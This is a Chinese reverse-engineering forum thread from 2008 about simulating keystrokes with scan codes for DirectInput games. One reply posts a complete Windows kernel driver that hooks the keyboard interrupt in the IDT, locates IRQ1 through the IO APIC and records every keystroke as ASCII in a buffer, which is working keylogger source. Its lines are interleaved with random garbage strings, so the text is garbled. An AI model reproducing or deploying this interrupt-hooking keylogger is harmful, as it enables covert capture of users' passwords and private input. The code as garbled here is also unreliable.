首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[转帖]关于按键模拟的问题
发表于: 2008-1-17 11:18 12389

[转帖]关于按键模拟的问题

鸡蛋壳 活跃值
2008-1-17 11:18
12389
关于按键模拟的技术相信大家都有些了解。
不外乎keybd_event和SendInput两个函数。
很多人都说这两个函数只能对Win32普通应用程序管用,对游戏,特别是使用DirectInput的游戏,都没反映,以至于很多人误解这两个函数产生的按键事件都比较靠上层,其实不然。

VOID keybd_event(
    BYTE bVk,
    BYTE bScan,
    DWORD dwFlags,
    PTR dwExtraInfo
);
MSDN上面的说明
bScan:This parameter is not used.

其实这个参数是有用的,和SendInput一样,如果不指定扫描码的话DirectInput是无法收到的。
另外,使用keybd_event函数还要在dwFlags上面多指定一个8,这个跟SendInput一样,意义就是 KEYEVENTF_SCANCODE,也就是说告诉系统我们要使用硬件扫描码,需要注意的是这个值在SendInput里面有说明,而 keybd_event就没说了,但是经过试验,的确好用。

其实就这么一点点小改动就OK了,不至于象很多人说的那样非要去写一个虚拟设备驱动程序。

就是dwFlags在原来的基础上+8
比如以前是KEYEVENTF_KEYUP,新的就用KEYEVENTF_KEYUP+8就是。或者KEYEVENTF_KEYUP+INPUT_HARDWARE

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (5)
forgot
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
私信
2
问题是有hook
2008-1-17 12:27
0
combojiang
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
私信
3
天下无贼
2008-1-17 15:18
0
DonQuixote
雪    币: 135
活跃值: (226)
能力值: ( LV12,RANK:330 )
在线值:
发帖
回帖
粉丝
私信
4
直接把扫描码写回echo back,再模拟产生个键盘中断就行了,和真的按键没什么区别

UCHAR sch='\x1E'; // scan code for key A
int vectorid=search_irq1();
WRITE_PORT_UCHAR((PUCHAR)0x64,0xD2); // echo back command
WaitForKbWrite();
WRITE_PORT_UCHAR((PUCHAR)0x60,sch);
char*call_isr=(char*)ExAllocatePool(NonPagedPool,3);
call_isr[1]='\xCD'; // int XX
call_isr[2]=(char)vectorid;
call_isr[3]='\xC3'; // ret
__asm call dword ptr call_isr;
ExFreePool(call_isr);
2008-1-18 20:58
0
鸡蛋壳
雪    币: 427
活跃值: (412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
修改中断描述符表(IDT)中的键盘入口实现按健记录,把读取到的键盘扫描码转换成 ascii 码记录下来。查找键盘入口采用了查询 IO APIC 的重定向寄存器的方法(通过把物理地址 0xFEC00000 映射为虚拟地址,然后读取键盘中断向量) 6s:Cpu  
$b,?ug`h  
N*aY)G/M&  
文字 M1#f@   
#include <ntddk.h> ^mL S$X  
#include <stdio.h> qtC0YP  
!Y `.^<  
#define      MAX_CHARS                  256 2ki;Z"#i  
#define MAKELONG(a, b) ((unsigned long) (((unsigned short) (a)) | ((unsigned long) ((unsigned short) (b))) << 16)) l*.)\(c  
ZGjw G7-l  
p< \:b]#6  
PUCHAR KEYBOARD_PORT_60 = (PUCHAR)0x60; a [blXbyfy  
PUCHAR KEYBOARD_PORT_64 = (PUCHAR)0x64; ^6,Bu}Cf.w  
v05-. V[\  
// status register bits O"Nh) Wc  
#define IBUFFER_FULL            0x02 w8H^ 7?=W  
#define OBUFFER_FULL            0x01 s)KR 7i4  
FJ9P#yw2  
// flags for keyboard status M%4tAA.\  
#define      S_SHIFT                        1 }&voZzE@  
#define      S_CAPS                        2 PJpdNJjY  
#define      S_NUM                        4 %gl=3 S'(  
$ y-%'m  
int kb_status = S_NUM; �d &sE4  
[f+t p%/  
/////////////////////////////////////////////////// omtJ(dSv  
// IDT structures ^91EyaQc_  
/////////////////////////////////////////////////// Ho: {~R  
#pragma pack(1) To$!sA\uDS  
u]?1d~q  
// entry in the IDT, this is sometimes called Fs//dw46  
// an "interrupt gate" aXi*N3<  
typedef struct " u�'"[  
{  '- -)z);  
     unsigned short LowOffset; 7D<E`o=`.H  
     unsigned short selector; #JPL$<h  
     unsigned char unused_lo; F~1~?<V%~  
     unsigned char segment_type:4;      //0x0E is an interrupt gate t0p *N$/o  
     unsigned char system_segment_flag:1; yj G, +  
     unsigned char DPL:2;      // descriptor privilege level aF `#-i  
     unsigned char P:1; /* present */ 8jWic"t  
     unsigned short HiOffset; pYFRP5+i  
} IDTENTRY; 3+g\)4  
vfV3 ^hP  
/* sidt returns idt in this format */ a&'Y#4<7  
typedef struct s_[nPC%Z  
{ j1~o(bZ+h  
     unsigned short IDTLimit; <V/qfrkE  
     unsigned short LowIDTbase; .b%)P+m  
     unsigned short HiIDTbase; tk4y58_  
} IDTINFO; GJ0AFOeY  
1QRDG0$p  
#pragma pack() .7;%g  
:!�hNn F  
int      kb_int = 0x93; *'7KTF  
kB@z*S  
unsigned long old_ISR_pointer; 6`cf�3XT  
unsigned char keystroke_buffer[MAX_CHARS]; \_R<c VUX  
int kb_array_ptr=0; @@H8 �@  
~_]~J;(  
unsigned char asciiTbl[]={ (v? DJ  
  0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,      //normal R7z  
  0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73, ldf>v>1UE  
  0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76, M`UZ:#S 5F  
  0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, L�h6gdLe'F  
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31, 1\bsX*A,  
  0x32, 0x33, 0x30, 0x2E, nU<7*'Y!  
  0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,      //caps HCc1" j^o  
  0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53, _kcfXn`1H/  
  0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56, TL=tMR6~  
  0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9>pnya V+  
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31, $-}&k!Aybh  
  0x32, 0x33, 0x30, 0x2E, 2Kkbl@T*  
  0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,      //shift !F[,V?58  
  0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53, K;Myzk  
  0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56, ~Ex4fD1C07  
  0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, J}P:wX i  
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31, o.[R&rl8  
  0x32, 0x33, 0x30, 0x2E, PE'zl?] x  
  0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,      //caps + shift _%#^-TM  
  0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73, xXfMx-T 5  
  0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76, #C*IoB2i9z  
  0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, qf=S*y  
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31, JfA`se.w  
  0x32, 0x33, 0x30, 0x2E v' !yC6/[  
}; A0t=zo&}  
\Oqc[Ck#v  
ULONG WaitForKbRead() m`wHd}1  
{ _[2 i"UX0  
     int i = 100; S2Kh9/  
     UCHAR mychar; G ~j3|+�T  
      &<ZWG nE_  
     do Oq;r-#CL  
     { ) J+BN  
           mychar = READ_PORT_UCHAR( KEYBOARD_PORT_64 ); ,bm{@'&Oy  
OqM9'\  
           KeStallExecutionProcessor(666); V0*}Nm#)!  
N.'g/ "{:  
           if(!(mychar & OBUFFER_FULL)) break;  PF41J  
     } E[.`W/0e6  
     while (i--); ;2dz.  
-`RsV16f-w  
     if(i) return TRUE; D hHk �  
     return FALSE; aNZH  3}  
} aVDKR:LML  
 =9~-9u  
ULONG WaitForKbWrite() -q>+V 0FDM  
{ -d_p&/�  
     int i = 100; \!Oo{p  
     UCHAR mychar; Hl)~(:dP  
      VG>K}  
     do >W}9J73k  
     { &6 ZQ*P  
           mychar = READ_PORT_UCHAR( KEYBOARD_PORT_64 ); EcLQPl  
K qe&Da  
           KeStallExecutionProcessor(666); '!72I,B  
3O-uP]H  
           if(!(mychar & IBUFFER_FULL)) break; qi_U\ .D  
     } Lq<y"y  
     while (i--); piiJ}%�l  
#jTmRs]Qt  
     if(i) return TRUE; G \ }(}R  
     return FALSE; :MC"K!q"E  
} ~U}(f`;J  
:=wxkhho  
VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) o)Y/ktW,O  
{ /O9J #jq  
     IDTINFO            idt_info; VaDs5]^U  
     IDTENTRY*      idt_entries; #xZWW k  
     char _t[255]; /XmM_91x  
aXd4%x<  
     // load idt_info [jar|J!;  
     __asm      sidt      idt_info       ^%$_`V*)  
     idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase); \UIC^-X  
=BPC@z lU  
     DbgPrint("UnHooking Interrupt..."); C/Bxj<QAM  
?G]ca[1I  
     // restore the original interrupt handler 9{(cAp4q  
     __asm cli '_G(Kq )  
     idt_entries[kb_int].LowOffset = (unsigned short) old_ISR_pointer; +n}}_X; af  
     idt_entries[kb_int].HiOffset = (unsigned short)((unsigned long)old_ISR_pointer >> 16); k9n1ct2qM  
     __asm sti Z0C,8@lL!  
O*+$�N?.  
     DbgPrint("UnHooking Interrupt complete."); B ozn52a  
      etl~G  
     DbgPrint("Keystroke Buffer is: "); +kF4P3B  
     DbgPrint("%s", keystroke_buffer); 6#CyTu+  
} VF~7|;,2  
>,.t  
// using stdcall means that this function fixes the stack before returning (opposite of cdecl) :tz/ZHDRa  
void __stdcall print_keystroke() (Oo\hG%I  
{ K8' E-N  
     UCHAR      sch, ch = 0; rxaR=zK  
     int            off = 0; EFp*~m}6  
oNL}}mc4I  
     WaitForKbRead(); qD-B}yW  
     sch = READ_PORT_UCHAR(KEYBOARD_PORT_60); %bf' 7amW4  
     if (sch == 0xE0) UO2' E\9bJ  
     { S " ]WP(  
           WaitForKbRead(); T�rBv<:|  
           sch = READ_PORT_UCHAR(KEYBOARD_PORT_60); ~0+9rMre}  
     } CMZ/2 ma+  
/e L%VP  
     if (kb_status & S_CAPS) >\?+,1Sf)9  
           off += 0x54; 'EyT-sV  
     if (kb_status & S_SHIFT) V�ENK1"`tC  
           off += 0x54 * 2; 3Y+2|di/C  
%B@9LXuTlI  
     if ((sch & 0x80) == 0)      //make RV@Ibj  
     { 0x$0nxy U  
           if ((sch < 0x47) || $8[IL$j#^t  
                 ((sch >= 0x47 && sch < 0x54) && (kb_status & S_NUM))) // Num Lock ?kF kg  
           { h> n3 [  
                 ch = asciiTbl[off+sch]; ll+e\I!1  
           } ? ?%5 DG  
            /S^qd@vA  
           switch (sch) j6&.);  
           { ynY%:&>0|  
           case 0x3A: 'jBe LN  
                 kb_status ^= S_CAPS; B< cXnI  
                 break; Gv#@)cW8(  
VF .uz~!  
           case 0x2A: uQnTD  
           case 0x36: i:3Z�2F01  
                 kb_status |= S_SHIFT; .N]^#}x  
                 break; F' ?:  
xIz8oFd"F  
           case 0x45: 8wsl3>q  
                 kb_status ^= S_NUM; Gn6CE/>gz  
           } Drpe8 ;O  
     } 3,is~]VCH  
     else            //break ;gKj/^.5  
     { $ !$\  
           if (sch == 0xAA || sch == 0xB6) %Qk"*2"N:`  
                 kb_status &= ~S_SHIFT; j8@�X%#b  
     } s>'&^DuF  
1XjEi +r  
     if (ch >= 0x20 && ch < 0x7F) ] x;�;4 X  
     { G*4kl(=  
           keystroke_buffer[kb_array_ptr++] = ch; S}8jX=~  
           keystroke_buffer[kb_array_ptr] = '\0'; C-'<&Iw  
           if (kb_array_ptr >= MAX_CHARS-1) VC0UUj8{  
           { sF!hW E'[  
                 kb_array_ptr = 0; 4(aT/U=  
           } ,34$DY-  
     } H6VSFK  
2hlx-,&H  
     //put scancode back (works on PS/2) PqJ�T$gy)  
     WRITE_PORT_UCHAR(KEYBOARD_PORT_64, 0xD2); //command to echo back scancode       uy6"HTzi  
     WaitForKbWrite(); X\ r<Go  
     WRITE_PORT_UCHAR(KEYBOARD_PORT_60, sch); //write the scancode to echo back TgnPeD*  
} QiT;5}  
T|$y`MpE�  
// naked functions have no prolog/epilog code - they are functionally like the i}|fK1go  
// target of a goto statement U=i 7j  
__declspec(naked) my_interrupt_hook() q\x14E :  
{ [ d6`g#A  
     __asm (Hl oj^)y  
     { R~OF ph>F  
           pushad                              // save all general purpose registers ;IPc)M,pK  
           pushfd                              // save the flags register 2.-hW&VU]  
           call      print_keystroke      // call function DwI6 [GQQ  
           popfd                              // restore the flags :Dk,F3+  
           popad                              // restore the general registers D tGG{R  
           jmp            old_ISR_pointer      // goto the original ISR UFy? N  
     } 'xXkF}=  
} 372k-AKr  
m@�2{\  
// Intel 82093AA I/O Advanced Programmable Interrupt Controller (I/O APIC) Datasheet.pdf 4 M.@yq  
int search_irq1() O�8Q{= g9  
{ ^y}aX^  
     unsigned char *pIoRegSel; M' }$Ra,%  
     unsigned char *pIoWin; %H>zo-e  
     unsigned char ch; sTzuE{^&+  
~AA? KAG  
     PHYSICAL_ADDRESS      phys; ."bCp  
     PVOID                        pAddr; WL,GW#{:  
\Ykt*N6$L  
     phys.u.LowPart = 0xFEC00000; \2]3vKT  
     pAddr = MmMapIoSpace(phys, 0x14, MmNonCached); fmsz\�i~  
     if (pAddr == NULL) eqo%9%   
           return 0; 9fskaK2E  
;_TG^   
     pIoRegSel = (unsigned char *)pAddr; 009z hM  
     pIoWin = (unsigned char *)(pAddr) + 0x10; s3mP@P  
8h1'a*->  
/* z$Ar3  
{ OqyM(0d4\  
     int i; }&J:.;Zn  
     unsigned char j; _Z\Vtw5"  
PCV%Zj[B  
     for (i = 0, j = 0x10; i <= 0x17; i++, j += 2) okPhby]  
     { *C_1Z%ptu}  
           *pIoRegSel = j; `N,[Q'S  
           ch = *pIoWin; E0_+#`  
           DbgPrint("RedTbl[%02d]: 0x%02X\n", i, ch); CqT5�%Oj,$  
     } /epD\zF;  
} Qnew93  
*/ lu%YoC   
lF75TXV|%  
     *pIoRegSel = 0x12;      // irq1 h +9k@  
     ch = *pIoWin; t*xA5~%iC  
p;7+U!ES  
     MmUnmapIoSpace(pAddr, 0x14); .PT;)^lq=  
z6,b#7tEWC  
     return (int)ch; <Q/V HR]  
} }nuS  
UT3GF9aG  
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) )CO0i5  
{ $3UL g8G  
     IDTINFO            idt_info; >REY.> by#  
     IDTENTRY*      idt_entries; DXo[tT;$:  
     char _t[255]; 26XL_5M  
      5vb|cn;{4v  
     theDriverObject->DriverUnload = OnUnload; :Jkb<B$-  
V97O\ik;I  
     kb_int = search_irq1(); ua5(f~=  
     DbgPrint("kb_int = 0x%02X\n", kb_int); [8zCL  
_5)d(ju  
     // load idt_info <1t{v<&Z  
     __asm      sidt      idt_info d\Ktox" "  
      ]q`%$c`+h  
     idt_entries = (IDTENTRY*) MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase); 2K@~9  
 V.^RrzF  
     DbgPrint("Hooking Interrupt..."); b6Mjsng  
     old_ISR_pointer = MAKELONG(idt_entries[kb_int].LowOffset,idt_entries[kb_int].HiOffset); 7(IG,;N   
      12"k-B<  
     // remember we disable interrupts while we patch the table >!dxmY0d Y  
     __asm cli %0u`@$\u4  
     idt_entries[kb_int].LowOffset = (unsigned short)my_interrupt_hook; |vEe3|?bG  
     idt_entries[kb_int].HiOffset = (unsigned short)((unsigned long)my_interrupt_hook >> 16); c55wA92L  
     __asm sti Y+S/ ^4  
[_ya Jp  
     DbgPrint("Hooking Interrupt complete: Old = 0x%08X, New = 0x%08X\n", old_ISR_pointer, my_interrupt_hook); fwt3?;K  
wET+5Sx/�  
     return STATUS_SUCCESS; "[8@_|%  
//      return STATUS_DEVICE_CONFIGURATION_ERROR; ?$NiZXJ  
}
2008-1-18 23:33
0
gdlian
雪    币: 197
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
鼠标呢? 想写个类似按键精灵的东东
2008-1-21 01:30
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//